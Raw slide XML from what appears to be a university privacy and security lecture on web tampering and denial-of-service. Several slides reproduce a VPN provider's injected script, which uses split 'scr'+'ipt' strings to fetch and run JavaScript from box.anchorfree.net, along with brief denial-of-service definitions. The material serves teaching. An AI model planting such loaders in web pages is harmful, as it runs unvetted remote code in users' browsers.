              <a:t>parent.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)?0:1,'AFVER':'3.42','fbw':false,'FBWCNT':0,'FBWCNTNAME':'FBWCNT_FIREFOX','NOFBWNAME':'NO_FBW_FIREFOX','B':'f','VER': 'us'};if(_AF2$.TOP==1){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='http://box.anchorfree.net/insert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insert.php?sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.SN+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.CH+"&amp;v="+ANCHORFREE_VERSION+6+"&amp;b="+_AF2$.B+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.VER+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>afver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.AFVER+"' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;");}&lt;/script&gt;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THIS TEXT HAS BEEN CHANGED.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&lt;/body&gt;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&lt;/html&gt;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4056" y="542925"/>
            <a:ext cx="10783888" cy="26511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&lt;title&gt;Basic web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&lt;link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="http://vaniea.com/teaching/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>privacyToday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/basic.css" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>" type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>="username=John Doe;";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&lt;body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>	THIS TEXT HAS BEEN CHANGED.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&lt;/html&gt;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00" y="2915478"/>
            <a:ext cx="11062252" cy="79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581322" y="543338"/>
            <a:ext cx="2024270" cy="113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Correct Answer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581322" y="3286537"/>
            <a:ext cx="2024270" cy="113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Attacked Answer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82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some news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7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569913"/>
            <a:ext cx="10515600" cy="56070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ANCHORFREE_VERSION="633161526“;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 smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> _AF2$ = {'SN':'HSSHIELD00US','IP':'216.172.135.223','CH':'HSSCNL000550','CT':'z51','HST':'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessStartTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=1422651433&amp;accessLP=1','AFH':'hss734','RN':Math.floor(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()*999),'TOP':(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>parent.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)?0:1,'AFVER':'3.42','fbw':false,'FBWCNT':0,'FBWCNTNAME':'FBWCNT_FIREFOX','NOFBWNAME':'NO_FBW_FIREFOX','B':'f','VER': 'us'};if(_AF2$.TOP==1){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt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='http://box.anchorfree.net/insert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>insert.php?sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.SN+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.CH+"&amp;v="+ANCHORFREE_VERSION+6+"&amp;b="+_AF2$.B+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.VER+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>afver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.AFVER+"' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;");}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0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569913"/>
            <a:ext cx="10515600" cy="56070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ANCHORFREE_VERSION="633161526“;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 smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> _AF2$ = {'SN':'HSSHIELD00US','IP':'216.172.135.223','CH':'HSSCNL000550','CT':'z51','HST':'&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sessStartTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=1422651433&amp;accessLP=1','AFH':'hss734','RN':Math.floor(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Math.random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()*999),'TOP':(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>parent.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>top.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)?0:1,'AFVER':'3.42','fbw':false,'FBWCNT':0,'FBWCNTNAME':'FBWCNT_FIREFOX','NOFBWNAME':'NO_FBW_FIREFOX','B':'f','VER': 'us'};if(_AF2$.TOP==1){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>='http://box.anchorfree.net/insert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insert.php?sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.SN+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.CH+"&amp;v="+ANCHORFREE_VERSION+6+"&amp;b="+_AF2$.B+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.VER+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>afver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="+_AF2$.AFVER+"' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt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en-US" dirty="0" smtClean="0"/>
              <a:t>");}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3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code is downloading more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> from box.anchorfree.net and running it on the client.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 err="1" smtClean="0"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>='http://box.anchorfree.net/insert/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>insert.php?sn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.SN+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.CH+"&amp;v="+ANCHORFREE_VERSION+6+"&amp;b="+_AF2$.B+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.VER+"&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>afver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>="+_AF2$.AFVER+"' type='text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>'&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>"+"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" err="1" smtClean="0"/>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0"/>
              <a:t>&gt;”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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509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289300" y="2184400"/>
            <a:ext cx="4533900" cy="2209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Here Be Dragons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00" y="2417762"/>
            <a:ext cx="1767500" cy="150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4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Computer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10650" y="1498600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Website Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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omputer_desk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1731146" y="3238500"/>
            <a:ext cx="1558154" cy="1072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3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41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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>DoS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9875520" cy="736282"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An attack that prevents valid users from accessing a service.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Common examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cutting power, cables, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overloading a server with invalid traffic </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Removing a user account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800" dirty="0" smtClean="0"/>
              <a:t>Attacks:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>SYN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>flooding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Smurfing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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63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202" r="1035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2503300" y="538338"/>
            <a:ext cx="7397158" cy="4621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4721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740" y="3833182"/>
            <a:ext cx="11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Attacker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63113" y="381176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Victim </a:t>
            </a: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Verizon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26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Telecom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05086" y="2791318"/>
            <a:ext cx="105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Three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21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24" y="24310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0" y="152976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97" y="24590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4" y="416759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1" y="65426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8" y="126109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13" y="2298999"/>
            <a:ext cx="1767500" cy="1502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76" y="5146053"/>
            <a:ext cx="698366" cy="593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85" y="4474694"/>
            <a:ext cx="698366" cy="5936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67" y="5185847"/>
            <a:ext cx="698366" cy="5936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8" y="5301720"/>
            <a:ext cx="698366" cy="593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49" y="5177852"/>
            <a:ext cx="698366" cy="5936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40" y="4619093"/>
            <a:ext cx="698366" cy="59361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32" idx="0"/>
            <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="1174750" cy="7798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  <a:endCxn id="11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7246118" y="3694877"/>
            <a:ext cx="14941" cy="14511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11" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6101250" y="3694877"/>
            <a:ext cx="1144868" cy="14909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" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3866382" y="3605678"/>
            <a:ext cx="1190832" cy="17133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0"/>
            <a:endCxn id="4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621823" y="3605678"/>
            <a:ext cx="1244559" cy="10134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4" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3781632" y="3605678"/>
            <a:ext cx="84750" cy="15721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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752528" y="3079750"/>
            <a:ext cx="1495415" cy="134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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2021796" y="1683266"/>
            <a:ext cx="1338993" cy="10103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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5195166" y="1090245"/>
            <a:ext cx="1" cy="862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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3996653" y="1261097"/>
            <a:ext cx="154045" cy="1316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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2798140" y="1498600"/>
            <a:ext cx="911060" cy="10947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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5898660" y="1087440"/>
